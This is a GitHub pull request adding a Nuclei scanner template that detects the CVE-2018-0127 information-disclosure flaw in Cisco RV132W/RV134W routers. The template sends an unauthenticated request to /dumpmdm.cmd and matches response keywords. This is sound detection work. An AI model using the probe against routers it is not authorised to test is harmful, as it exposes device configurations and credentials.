### PR TITLE
Added CVE-2018-0127 template.

### DIFF
--- a/cves/2018/CVE-2018-0127.yaml
+++ b/cves/2018/CVE-2018-0127.yaml
@@ -1,22 +1,23 @@
 id: CVE-2018-0127
+
 info:
-  name: Cisco RV132W and RV134W Wireless VPN Routers Unauthenticated Information Disclosure Vulnerability
+  name: Cisco RV132W and RV134W Router Information Disclosure
   author: jrolf
   severity: critical
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-0127
-  description: Detects Cisco devices vulnerable to CVE-2018-0127
-  tags: cve,cve2018,cisco
+  description: A vulnerability in the web interface of Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device, which could lead to the disclosure of confidential information.
+  tags: cve,cve2018,cisco,router
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/dumpmdm.cmd"
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: word
         words:
           - "Dump"

--- a/cves/2018/CVE-2018-0127.yaml
+++ b/cves/2018/CVE-2018-0127.yaml
@@ -1,0 +1,26 @@
+id: CVE-2018-0127
+info:
+  name: Cisco RV132W and RV134W Wireless VPN Routers Unauthenticated Information Disclosure Vulnerability
+  author: jrolf
+  severity: critical
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-0127
+  description: Detects Cisco devices vulnerable to CVE-2018-0127
+  tags: cve,cve2018,cisco
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/dumpmdm.cmd"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "Dump"
+          - "MDM"
+          - "cisco"
+          - "admin"
+        part: body


### PR DESCRIPTION
### Template / PR Information

(CVE-2018-0127) Exploits vulnerability in the web interface of Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers. Nuclei template sends unauthenticated GET request to "{{BaseURL}}/dumpmdm.cmd", and infers vulnerability based on '200 OK' AND matched keywords in the body of response. 

- Added CVE-2018-0127
- References: 
   - https://nvd.nist.gov/vuln/detail/CVE-2018-0127
   - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

![image](https://user-images.githubusercontent.com/73311665/135677403-32114cda-e2d3-461f-8963-0278bce75d75.png)

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)